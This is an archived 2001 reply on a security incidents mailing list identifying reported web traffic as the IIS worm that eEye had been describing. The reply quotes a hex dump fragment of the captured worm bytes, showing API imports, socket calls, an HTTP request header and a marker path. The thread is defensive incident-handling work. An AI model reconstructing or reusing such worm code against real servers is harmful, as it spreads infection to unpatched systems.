Security Incidents mailing list archives

Re: Strange web traffic

From: Ryan Russell <ryan () securityfocus com>
Date: Tue, 17 Jul 2001 14:03:39 -0600 (MDT)

That is indeed a worm, though you're missing the first part of the
conversation.

This is the worm that Marc from eeye has been posting about, I saw a post
to incidents about it arrive shortly before this one, forwarded from
Aleph1.

                                                Ryan

On Tue, 17 Jul 2001, Scott Nursten wrote:

0x01c0   2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f        *.L.3.........Lo
0x01d0   6164 4c69 6272 6172 7941 0047 6574 5379        adLibraryA.GetSy
0x01e0   7374 656d 5469 6d65 0043 7265 6174 6554        stemTime.CreateT
0x01f0   6872 6561 6400 4372 6561 7465 4669 6c65        hread.CreateFile
0x0200   4100 536c 6565 7000 4765 7453 7973 7465        A.Sleep.GetSyste
0x0210   6d44 6566 6175 6c74 4c61 6e67 4944 0056        mDefaultLangID.V
0x0220   6972 7475 616c 5072 6f74 6563 7400 0969        irtualProtect..i
0x0230   6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053        nfocomm.dll.TcpS
0x0240   6f63 6b53 656e 6400 0957 5332 5f33 322e        ockSend..WS2_32.
0x0250   646c 6c00 736f 636b 6574 0063 6f6e 6e65        dll.socket.conne
0x0260   6374 0073 656e 6400 7265 6376 0063 6c6f        ct.send.recv.clo
0x0270   7365 736f 636b 6574 0009 7733 7376 632e        sesocket..w3svc.
0x0280   646c 6c00 0047 4554 2000 3f00 2020 4854        dll..GET..?...HT
0x0290   5450 2f31 2e30 0d0a 436f 6e74 656e 742d        TP/1.0..Content-
0x02a0   7479 7065 3a20 7465 7874 2f78 6d6c 0a48        type:.text/xml.H
0x02b0   4f53 543a 7777 772e 776f 726d 2e63 6f6d        OST:www.worm.com
0x02c0   0a20 4163 6365 7074 3a20 2a2f 2a0a 436f        ..Accept:.*/*.Co
0x02d0   6e74 656e 742d 6c65 6e67 7468 3a20 3335        ntent-length:.35
0x02e0   3639 200d 0a0d 0a00 633a 5c6e 6f74 776f        69......c:\notwo
0x02f0   726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c        rm.LMTH..<html><




----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com

Current thread:

Strange web traffic Scott Nursten (Jul 17)
- Re: Strange web traffic Scott Nursten (Jul 17)
  - Re(2): Strange web traffic Ken Eichman (Jul 17)
- Re: Strange web traffic Ryan Russell (Jul 17)